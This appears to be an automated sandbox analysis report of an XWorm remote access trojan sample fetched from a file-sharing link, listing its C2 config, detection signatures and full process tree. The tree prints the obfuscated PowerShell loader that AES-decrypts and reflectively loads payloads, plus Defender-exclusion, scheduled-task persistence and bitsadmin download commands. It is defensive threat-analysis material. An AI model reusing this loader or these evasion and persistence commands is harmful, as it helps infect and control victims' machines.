Analysis
-
max time kernel
110s -
max time network
122s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
09-06-2024 09:42
Errors
Reason
Machine shutdown
General
-
Target
https://gofile.io/d/TLyqC3
Score
10/10
Malware Config
Extracted
Family
xworm
C2
127.0.0.1:44454
Name1442-44454.portmap.host:44454
Attributes
-
Install_directory
%Temp%
-
install_file
LX.exe
Signatures
-
Detect Xworm Payload 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 3 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 8 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Modifies registry class 64 IoCs
-
NTFS ADS 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 35 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding2⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Local\Temp\LX.exeC:\Users\Admin\AppData\Local\Temp\LX.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LX.exeC:\Users\Admin\AppData\Local\Temp\LX.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/TLyqC32⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffa87cab58,0x7fffa87cab68,0x7fffa87cab783⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1572 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2172 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2900 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2908 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3356 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3664 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4196 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4356 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:13⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4520 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:83⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4288 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:83⤵
- NTFS ADS
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 --field-trial-handle=1816,i,7933754409046085973,10528121498242160484,131072 /prefetch:83⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\LXStander.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rSPWyLMpVODQFeipYUBycYBIqWdREMGJxSUE3hY7XNE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4gwvlA4SHKe+6cTXJXevyg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YKEWy=New-Object System.IO.MemoryStream(,$param_var); $iOwTP=New-Object System.IO.MemoryStream; $AiSWp=New-Object System.IO.Compression.GZipStream($YKEWy, [IO.Compression.CompressionMode]::Decompress); $AiSWp.CopyTo($iOwTP); $AiSWp.Dispose(); $YKEWy.Dispose(); $iOwTP.Dispose(); $iOwTP.ToArray();}function execute_function($param_var,$param2_var){ $vGWuZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SJusj=$vGWuZ.EntryPoint; $SJusj.Invoke($null, $param2_var);}$CkwxY = 'C:\Users\Admin\Downloads\LXStander.bat';$host.UI.RawUI.WindowTitle = $CkwxY;$WaxPe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CkwxY).Split([Environment]::NewLine);foreach ($oLcNO in $WaxPe) { if ($oLcNO.StartsWith('UaXZkMaWdgBvBuaytIEr')) { $UDTrE=$oLcNO.Substring(20); break; }}$payloads_var=[string[]]$UDTrE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_969_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_969.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_969.vbs"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_969.bat" "6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rSPWyLMpVODQFeipYUBycYBIqWdREMGJxSUE3hY7XNE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4gwvlA4SHKe+6cTXJXevyg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YKEWy=New-Object System.IO.MemoryStream(,$param_var); $iOwTP=New-Object System.IO.MemoryStream; $AiSWp=New-Object System.IO.Compression.GZipStream($YKEWy, [IO.Compression.CompressionMode]::Decompress); $AiSWp.CopyTo($iOwTP); $AiSWp.Dispose(); $YKEWy.Dispose(); $iOwTP.Dispose(); $iOwTP.ToArray();}function execute_function($param_var,$param2_var){ $vGWuZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SJusj=$vGWuZ.EntryPoint; $SJusj.Invoke($null, $param2_var);}$CkwxY = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_969.bat';$host.UI.RawUI.WindowTitle = $CkwxY;$WaxPe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CkwxY).Split([Environment]::NewLine);foreach ($oLcNO in $WaxPe) { if ($oLcNO.StartsWith('UaXZkMaWdgBvBuaytIEr')) { $UDTrE=$oLcNO.Substring(20); break; }}$payloads_var=[string[]]$UDTrE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe"C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe"8⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LXDeveloper.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LX.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LX.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "LX" /tr "C:\Users\Admin\AppData\Local\Temp\LX.exe"9⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}9⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text10⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 193.161.193.99 44454 <123456789> 164384575474337576269⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\LXLoader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}8⤵
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://objects.githubusercontent.com/github-production-release-asset-2e65be/800426404/c15bbce8-4a31-4cc5-9245-05a9cd344f58?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240606%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240606T121036Z&X-Amz-Expires=300&X-Amz-Signature=7701bb5d03d0ca82630dfde501713c8a5abac251571ebd4afb3bd2c2a31bddf2&X-Amz-SignedHeaders=host&actor_id=81531607&key_id=0&repo_id=800426404&response-content-disposition=attachment%3B%20filename%3DLXLauncher.exe&response-content-type=application%2Foctet-stream C:\Users\Admin\AppData\Local\Temp\LXLauncher.exe9⤵
- Download via BitsAdmin
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\LXStander.bat" "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rSPWyLMpVODQFeipYUBycYBIqWdREMGJxSUE3hY7XNE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4gwvlA4SHKe+6cTXJXevyg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YKEWy=New-Object System.IO.MemoryStream(,$param_var); $iOwTP=New-Object System.IO.MemoryStream; $AiSWp=New-Object System.IO.Compression.GZipStream($YKEWy, [IO.Compression.CompressionMode]::Decompress); $AiSWp.CopyTo($iOwTP); $AiSWp.Dispose(); $YKEWy.Dispose(); $iOwTP.Dispose(); $iOwTP.ToArray();}function execute_function($param_var,$param2_var){ $vGWuZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SJusj=$vGWuZ.EntryPoint; $SJusj.Invoke($null, $param2_var);}$CkwxY = 'C:\Users\Admin\Downloads\LXStander.bat';$host.UI.RawUI.WindowTitle = $CkwxY;$WaxPe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CkwxY).Split([Environment]::NewLine);foreach ($oLcNO in $WaxPe) { if ($oLcNO.StartsWith('UaXZkMaWdgBvBuaytIEr')) { $UDTrE=$oLcNO.Substring(20); break; }}$payloads_var=[string[]]$UDTrE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- NTFS ADS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_903_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_903.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_903.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_903.bat" "5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rSPWyLMpVODQFeipYUBycYBIqWdREMGJxSUE3hY7XNE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4gwvlA4SHKe+6cTXJXevyg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YKEWy=New-Object System.IO.MemoryStream(,$param_var); $iOwTP=New-Object System.IO.MemoryStream; $AiSWp=New-Object System.IO.Compression.GZipStream($YKEWy, [IO.Compression.CompressionMode]::Decompress); $AiSWp.CopyTo($iOwTP); $AiSWp.Dispose(); $YKEWy.Dispose(); $iOwTP.Dispose(); $iOwTP.ToArray();}function execute_function($param_var,$param2_var){ $vGWuZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SJusj=$vGWuZ.EntryPoint; $SJusj.Invoke($null, $param2_var);}$CkwxY = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_903.bat';$host.UI.RawUI.WindowTitle = $CkwxY;$WaxPe=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($CkwxY).Split([Environment]::NewLine);foreach ($oLcNO in $WaxPe) { if ($oLcNO.StartsWith('UaXZkMaWdgBvBuaytIEr')) { $UDTrE=$oLcNO.Substring(20); break; }}$payloads_var=[string[]]$UDTrE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
